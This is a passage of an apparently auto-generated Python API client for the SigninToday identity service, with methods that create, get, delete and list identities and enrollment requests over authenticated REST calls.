(connection, read) timeouts.
:return: InlineResponse2012
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_token_from_identity_with_http_info(organization_id, create_identityby_token, **kwargs) # noqa: E501
def create_token_from_identity_with_http_info(self, organization_id, create_identityby_token, **kwargs): # noqa: E501
"""Create an identity from token # noqa: E501
This API allows to create an identity from a token. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_token_from_identity_with_http_info(organization_id, create_identityby_token, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param CreateIdentitybyToken create_identityby_token: Body of the request to create an identity from a token (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2012, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'create_identityby_token'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_token_from_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `create_token_from_identity`") # noqa: E501
# verify the required parameter 'create_identityby_token' is set
if ('create_identityby_token' not in local_var_params or
local_var_params['create_identityby_token'] is None):
raise ApiValueError("Missing the required parameter `create_identityby_token` when calling `create_token_from_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'create_identityby_token' in local_var_params:
body_params = local_var_params['create_identityby_token']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/create/token', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2012', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_appearance(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Delete the appearance of an identity # noqa: E501
This API allows to delete the appearance associated to an identity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_appearance(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of an user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2004
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_appearance_with_http_info(organization_id, identity_id, **kwargs) # noqa: E501
def delete_appearance_with_http_info(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Delete the appearance of an identity # noqa: E501
This API allows to delete the appearance associated to an identity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_appearance_with_http_info(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of an user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2004, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_appearance" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `delete_appearance`") # noqa: E501
# verify the required parameter 'identity_id' is set
if ('identity_id' not in local_var_params or
local_var_params['identity_id'] is None):
raise ApiValueError("Missing the required parameter `identity_id` when calling `delete_appearance`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'identity_id' in local_var_params:
path_params['identity-id'] = local_var_params['identity_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/{identity-id}/appearance', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2004', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_enrollment_request(self, organization_id, enrollment_id, **kwargs): # noqa: E501
"""Delete an enrollment request # noqa: E501
This API allows to delete an enrollment request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_enrollment_request(organization_id, enrollment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id enrollment_id: The **enrollment-id** is the uuid code that identifies a specific enrollment request (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2012
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_enrollment_request_with_http_info(organization_id, enrollment_id, **kwargs) # noqa: E501
def delete_enrollment_request_with_http_info(self, organization_id, enrollment_id, **kwargs): # noqa: E501
"""Delete an enrollment request # noqa: E501
This API allows to delete an enrollment request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_enrollment_request_with_http_info(organization_id, enrollment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id enrollment_id: The **enrollment-id** is the uuid code that identifies a specific enrollment request (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2012, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'enrollment_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_enrollment_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `delete_enrollment_request`") # noqa: E501
# verify the required parameter 'enrollment_id' is set
if ('enrollment_id' not in local_var_params or
local_var_params['enrollment_id'] is None):
raise ApiValueError("Missing the required parameter `enrollment_id` when calling `delete_enrollment_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'enrollment_id' in local_var_params:
path_params['enrollment-id'] = local_var_params['enrollment_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identity-requests/{enrollment-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2012', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_identity(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Delete an identity # noqa: E501
This API allows to delete an identity of an user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of an user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2003
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.delete_identity_with_http_info(organization_id, identity_id, **kwargs) # noqa: E501
def delete_identity_with_http_info(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Delete an identity # noqa: E501
This API allows to delete an identity of an user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_identity_with_http_info(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of an user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2003, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `delete_identity`") # noqa: E501
# verify the required parameter 'identity_id' is set
if ('identity_id' not in local_var_params or
local_var_params['identity_id'] is None):
raise ApiValueError("Missing the required parameter `identity_id` when calling `delete_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'identity_id' in local_var_params:
path_params['identity-id'] = local_var_params['identity_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/{identity-id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2003', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_enrollment_request(self, organization_id, enrollment_id, **kwargs): # noqa: E501
"""Get information about an enrollment request # noqa: E501
This API allows to get information about an enrollment request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_enrollment_request(organization_id, enrollment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id enrollment_id: The **enrollment-id** is the uuid code that identifies a specific enrollment request (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2011
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_enrollment_request_with_http_info(organization_id, enrollment_id, **kwargs) # noqa: E501
def get_enrollment_request_with_http_info(self, organization_id, enrollment_id, **kwargs): # noqa: E501
"""Get information about an enrollment request # noqa: E501
This API allows to get information about an enrollment request. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_enrollment_request_with_http_info(organization_id, enrollment_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id enrollment_id: The **enrollment-id** is the uuid code that identifies a specific enrollment request (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2011, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'enrollment_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_enrollment_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `get_enrollment_request`") # noqa: E501
# verify the required parameter 'enrollment_id' is set
if ('enrollment_id' not in local_var_params or
local_var_params['enrollment_id'] is None):
raise ApiValueError("Missing the required parameter `enrollment_id` when calling `get_enrollment_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'enrollment_id' in local_var_params:
path_params['enrollment-id'] = local_var_params['enrollment_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identity-requests/{enrollment-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2011', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_identity(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Get information about an identity # noqa: E501
This API allows to get all the information of an identity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identity(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of an user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2002
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_identity_with_http_info(organization_id, identity_id, **kwargs) # noqa: E501
def get_identity_with_http_info(self, organization_id, identity_id, **kwargs): # noqa: E501
"""Get information about an identity # noqa: E501
This API allows to get all the information of an identity. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_identity_with_http_info(organization_id, identity_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param Id identity_id: The **identity-id** is the uuid code that identifies an identity in the wallet of an user. It is, as well, used to restrict the requested operation to the scope of that identity (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2002, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'identity_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_identity" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `get_identity`") # noqa: E501
# verify the required parameter 'identity_id' is set
if ('identity_id' not in local_var_params or
local_var_params['identity_id'] is None):
raise ApiValueError("Missing the required parameter `identity_id` when calling `get_identity`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
if 'identity_id' in local_var_params:
path_params['identity-id'] = local_var_params['identity_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identities/{identity-id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2002', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_enrollment_requests(self, organization_id, **kwargs): # noqa: E501
"""Enumerate the enrollment requests of an organization # noqa: E501
This API allows to enumerate the enrollment requests of an organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_enrollment_requests(organization_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param str where_provider: Returns the identity requests that have been issued by the specified provider
:param str where_user: Returns the identity requests of the specified user, searched by its id
:param str where_first_name: Returns the identity requests of the users that have the specified first name
:param str where_last_name: Returns the identity requests of the users that have the specified last name
:param str where_registered_by: Returns the identity requests registered by this user
:param str where_fiscal_code: Returns the identity requests have the specified fiscal code
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2005
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_enrollment_requests_with_http_info(organization_id, **kwargs) # noqa: E501
def list_enrollment_requests_with_http_info(self, organization_id, **kwargs): # noqa: E501
"""Enumerate the enrollment requests of an organization # noqa: E501
This API allows to enumerate the enrollment requests of an organization. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_enrollment_requests_with_http_info(organization_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param str where_provider: Returns the identity requests that have been issued by the specified provider
:param str where_user: Returns the identity requests of the specified user, searched by its id
:param str where_first_name: Returns the identity requests of the users that have the specified first name
:param str where_last_name: Returns the identity requests of the users that have the specified last name
:param str where_registered_by: Returns the identity requests registered by this user
:param str where_fiscal_code: Returns the identity requests have the specified fiscal code
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2005, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'where_provider', 'where_user', 'where_first_name', 'where_last_name', 'where_registered_by', 'where_fiscal_code', 'page', 'count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_enrollment_requests" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
if ('organization_id' not in local_var_params or
local_var_params['organization_id'] is None):
raise ApiValueError("Missing the required parameter `organization_id` when calling `list_enrollment_requests`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_enrollment_requests`, must be a value less than or equal to `100`") # noqa: E501
if 'count' in local_var_params and local_var_params['count'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `count` when calling `list_enrollment_requests`, must be a value greater than or equal to `1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'organization_id' in local_var_params:
path_params['organization-id'] = local_var_params['organization_id'] # noqa: E501
query_params = []
if 'where_provider' in local_var_params:
query_params.append(('where_provider', local_var_params['where_provider'])) # noqa: E501
if 'where_user' in local_var_params:
query_params.append(('where_user', local_var_params['where_user'])) # noqa: E501
if 'where_first_name' in local_var_params:
query_params.append(('where_first_name', local_var_params['where_first_name'])) # noqa: E501
if 'where_last_name' in local_var_params:
query_params.append(('where_last_name', local_var_params['where_last_name'])) # noqa: E501
if 'where_registered_by' in local_var_params:
query_params.append(('where_registered_by', local_var_params['where_registered_by'])) # noqa: E501
if 'where_fiscal_code' in local_var_params:
query_params.append(('where_fiscal_code', local_var_params['where_fiscal_code'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'count' in local_var_params:
query_params.append(('count', local_var_params['count'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['ApiKeyAuth'] # noqa: E501
return self.api_client.call_api(
'/{organization-id}/identity-requests', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='InlineResponse2005', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def list_identities(self, organization_id, **kwargs): # noqa: E501
"""Enumerate the identities of an organization # noqa: E501
This API allows to enumerate all the users of an organization. It is possible to filter the data using the supported _django lookups_. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_identities(organization_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param str where_provider: Returns the identities that have been issued by the specified provider
:param str where_user: Returns the identities of the specified user, searched by its id
:param str where_first_name: Returns the identities of the users that have the specified first name
:param str where_last_name: Returns the identities of the users that have the specified last name
:param str where_registered_by: Returns the identities registered by this user
:param str where_fiscal_code: Returns the identities that have the specified fiscal code
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: InlineResponse2001
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.list_identities_with_http_info(organization_id, **kwargs) # noqa: E501
def list_identities_with_http_info(self, organization_id, **kwargs): # noqa: E501
"""Enumerate the identities of an organization # noqa: E501
This API allows to enumerate all the users of an organization. It is possible to filter the data using the supported _django lookups_. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.list_identities_with_http_info(organization_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str organization_id: The **organization-id** represents an organization that is included in the SigninToday application, also know as **slug** and it is used as a path parameter to restrict the asked functionality to the specified organization (required)
:param str where_provider: Returns the identities that have been issued by the specified provider
:param str where_user: Returns the identities of the specified user, searched by its id
:param str where_first_name: Returns the identities of the users that have the specified first name
:param str where_last_name: Returns the identities of the users that have the specified last name
:param str where_registered_by: Returns the identities registered by this user
:param str where_fiscal_code: Returns the identities that have the specified fiscal code
:param int page: Restricts the search to the chosen page
:param int count: Sets the number of users per page to display
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(InlineResponse2001, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['organization_id', 'where_provider', 'where_user', 'where_first_name', 'where_last_name', 'where_registered_by', 'where_fiscal_code', 'page', 'count'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method list_identities" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'organization_id' is set
